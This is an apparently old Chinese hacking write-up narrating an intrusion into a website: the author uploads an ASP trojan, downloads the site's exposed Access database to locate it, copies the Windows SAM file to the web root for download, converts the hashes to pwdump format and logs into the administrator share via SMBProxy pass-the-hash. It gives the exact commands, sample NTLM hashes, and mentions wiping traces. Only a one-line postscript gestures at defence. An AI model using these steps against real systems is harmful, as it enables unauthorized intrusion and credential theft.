我上传了ASP木马,系统自动编号了。01090208.asp呵呵,问题在哪里呢?来找一找……头大!又是动脑思考的时候了。看看他的数据库吧!于是……
http://www.target.net/data/ 不错!您没有权限…… 哈哈 原来真在这里啊!再试!
http://www.target.net/data/database.mdb 没有找到文件
http://www.target.net/data/target.mdb 嗯!行了!下载下来看!
呵呵!里面由用户列表、文章列表、还有系统统计——要的就是它!哈!果然找到了,01090208.asp的绝对路径就在里面,好,输入到浏览器里面看看……出来了!
[img]/UpLoadFiles/NewsPhoto/a5_885_1.jpg[/img]
好!copy SAM文件到网页根目录下载,在命令行里面输入:
copy d:\winnt\repair\sam e:\www.target.net\sam._
已成功复制1个文件,好了,在浏览器里面输入:
http://www.target.net/sam._
下载完毕……
下一步?LC4破解?不不!用新方法SMBProxy 登录!嘻嘻!新东西!
简介:
如果拿到一个远程主机NTLMHash密码信息, 一般都会使用暴力破解来获取密码,这个程序可以使用proxy方式与远程主机验证登陆,来达到快速进入的目的.
SMBProxy程序只认可pwdump格式的密码信息,LC格式不行,所以要将我得到的SAM文件转换为pwdump格式。
pwdump格式转换方法
先打开LC3,将SAM文件导入程序,随便选择一个模式进行破解,停止破解。
[img]/UpLoadFiles/NewsPhoto/5_885_19.jpg[/img]
将项目保存为LC3的文件格式——*.lcs。
使用SMBProxy自带的工具将LC格式的文件转换为pwdump格式。
E:\>perl lc3_conv.pl 2.lcs
Administrator:500:89B9639B628096295FBE6BDC86679876:C6EBC896A3C134D4CF18063C33ACC926:::
Guest:501:4316EDA750394C6B120438C30F7F1819:00000000000000000000000000000000:::
TsInternetUser:1000:1987DC7B3DE4A42761541729CD9CDFDD:28212D01DDEF0A91BA9022173515E9A6:::
…………………………
转换完毕
1. 停掉本机server服务,因为此程序默认使用127.0.0.1的139端口
net stop server
2. 运行本程序
smbproxy -s target -f pwdump3.txt 好了
3. 通过本地代理登陆远程主机
net use * \\127.0.0.1\c$ 123456/user:administrator
哈!成功!
其实,不用SMBProxy也只不过是为了快一点登录,使用LC4破解也是可行的,主要还是因为我很懒……
擦出了痕迹,归还了权限,我就撤退了,呵呵!
后记:关于ASP漏洞的补救,我不是很在行,只是提一些建议吧!
(编辑:aniston)
|